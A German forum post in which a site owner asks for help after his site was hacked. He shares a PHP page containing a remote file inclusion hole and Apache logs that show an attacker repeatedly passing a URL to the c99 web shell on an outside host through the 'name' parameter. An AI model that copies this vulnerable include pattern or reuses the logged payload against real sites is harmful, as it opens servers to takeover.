schleckerbeck
Erfahrenes Mitglied
Hi,
hab heute mit Erschrecken festgestellt, das meine Website aufgrund eines Fehlers im PHP Skript geknackt wurde. Hab hier mal die Datei und dann noch nen Auszug aus den Apache2 Logs:
Und hier der Apache Auszug:
Kann es sein, das durch die vielen GET Anfragen der Apache irgendeine Sicherheitslücke hat? Eine Überprüfung, ob die Variable $name irgendwelchen fremden Code (z.B. URL'S) enthält, hätte ich ja eingebaut.
Bitte um HILFE!
thx!
hab heute mit Erschrecken festgestellt, das meine Website aufgrund eines Fehlers im PHP Skript geknackt wurde. Hab hier mal die Datei und dann noch nen Auszug aus den Apache2 Logs:
PHP:
<?php
if (strpos($_POST[name], '://') !== FALSE || strpos($_POST[name], '../') !== FALSE)
die('Illegal string');
require("db.inc.php");
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>main</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body bgcolor="#FFFFFF" style="background-image:url(main.jpg); background-repeat:no-repeat; background-attachment:fixed; padding:0px;">
<div style="position:absolute; left:138px; top:0px; z-index:0">
<?php
echo "<img src=\"".$_GET[name]."/".$_GET[name].".jpg\" alt=\"\" border=\"0\">";
?>
</div>
<div style="position:absolute; left:0px; top:150px; width:133px">
<?php
if (strpos($_GET[name], '://') !== FALSE || strpos($_GET[name], '../') !== FALSE)
die('Illegal string');
if($_GET[name]=="ergebnisse")
{
include($_GET[name]."/sub.php");
}
?>
</div>
<div style="position:absolute; left:145px; top:75px; width:580px; z-index:1">
<?php
include($_GET[name]."/index.php");
?>
</div>
</body>
</html>
Und hier der Apache Auszug:
PHP:
196.3.62.3 - - [08/Jul/2006:19:40:45 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=home HTTP/1.1" 200 918
196.3.62.3 - - [08/Jul/2006:19:40:46 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=back HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:40:47 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=forward HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:40:48 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=up HTTP/1.1" 200 908
196.3.62.3 - - [08/Jul/2006:19:40:50 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=refresh HTTP/1.1" 200 909
196.3.62.3 - - [08/Jul/2006:19:40:51 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=search HTTP/1.1" 200 959
196.3.62.3 - - [08/Jul/2006:19:40:53 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=buffer HTTP/1.1" 200 872
196.3.62.3 - - [08/Jul/2006:19:40:54 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 794
196.3.62.3 - - [08/Jul/2006:19:40:55 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=small_dir HTTP/1.1" 200 873
196.3.62.3 - - [08/Jul/2006:19:40:56 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_diz HTTP/1.1" 200 1736
196.3.62.3 - - [08/Jul/2006:19:40:58 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=change HTTP/1.1" 200 999
196.3.62.3 - - [08/Jul/2006:19:40:58 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=download HTTP/1.1" 200 870
196.3.62.3 - - [08/Jul/2006:19:41:01 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_gif HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:41:00 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_lnk HTTP/1.1" 200 1281
196.3.62.3 - - [08/Jul/2006:19:41:03 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_png HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:41:03 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_php HTTP/1.1" 200 788
196.3.62.3 - - [08/Jul/2006:19:41:05 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_jpg HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:41:06 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_html_ HTTP/1.1" 200 1743
196.3.62.3 - - [08/Jul/2006:19:41:07 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_html HTTP/1.1" 200 939
196.3.62.3 - - [08/Jul/2006:19:41:08 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_zip HTTP/1.1" 200 1286
196.3.62.3 - - [08/Jul/2006:19:41:10 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_css HTTP/1.1" 200 843
196.3.62.3 - - [08/Jul/2006:19:41:12 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=arrow_ltr HTTP/1.1" 200 797
196.3.62.3 - - [08/Jul/2006:19:42:27 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=home HTTP/1.1" 200 918
196.3.62.3 - - [08/Jul/2006:19:42:21 +0200] "POST /main.php?name=http://ernealizm.com/shell/c99.txt? HTTP/1.1" 200 80484
196.3.62.3 - - [08/Jul/2006:19:42:31 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=back HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:42:34 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=forward HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:42:36 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=up HTTP/1.1" 200 908
196.3.62.3 - - [08/Jul/2006:19:42:36 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=refresh HTTP/1.1" 200 909
196.3.62.3 - - [08/Jul/2006:19:42:38 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=search HTTP/1.1" 200 959
196.3.62.3 - - [08/Jul/2006:19:42:39 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=buffer HTTP/1.1" 200 872
196.3.62.3 - - [08/Jul/2006:19:42:40 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 794
196.3.62.3 - - [08/Jul/2006:19:42:41 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=small_dir HTTP/1.1" 200 873
196.3.62.3 - - [08/Jul/2006:19:42:42 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_diz HTTP/1.1" 200 1736
196.3.62.3 - - [08/Jul/2006:19:42:43 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=change HTTP/1.1" 200 999
196.3.62.3 - - [08/Jul/2006:19:42:45 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=download HTTP/1.1" 200 870
196.3.62.3 - - [08/Jul/2006:19:42:45 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_lnk HTTP/1.1" 200 1281
196.3.62.3 - - [08/Jul/2006:19:42:47 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_html HTTP/1.1" 200 939
196.3.62.3 - - [08/Jul/2006:19:42:47 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_gif HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:42:50 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_php HTTP/1.1" 200 788
196.3.62.3 - - [08/Jul/2006:19:42:50 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_png HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:42:52 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_jpg HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:42:52 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_html_ HTTP/1.1" 200 1743
196.3.62.3 - - [08/Jul/2006:19:42:54 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_zip HTTP/1.1" 200 1286
196.3.62.3 - - [08/Jul/2006:19:42:54 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_css HTTP/1.1" 200 843
196.3.62.3 - - [08/Jul/2006:19:42:57 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=arrow_ltr HTTP/1.1" 200 797
196.3.62.3 - - [08/Jul/2006:19:44:12 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=back HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:44:14 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=home HTTP/1.1" 200 918
196.3.62.3 - - [08/Jul/2006:19:44:16 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=forward HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:44:19 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=up HTTP/1.1" 200 908
196.3.62.3 - - [08/Jul/2006:19:44:21 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=refresh HTTP/1.1" 200 909
196.3.62.3 - - [08/Jul/2006:19:44:23 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=search HTTP/1.1" 200 959
196.3.62.3 - - [08/Jul/2006:19:44:07 +0200] "POST /main.php?name=http://ernealizm.com/shell/c99.txt? HTTP/1.1" 200 82141
Kann es sein, das durch die vielen GET Anfragen der Apache irgendeine Sicherheitslücke hat? Eine Überprüfung, ob die Variable $name irgendwelchen fremden Code (z.B. URL'S) enthält, hätte ich ja eingebaut.
Bitte um HILFE!
thx!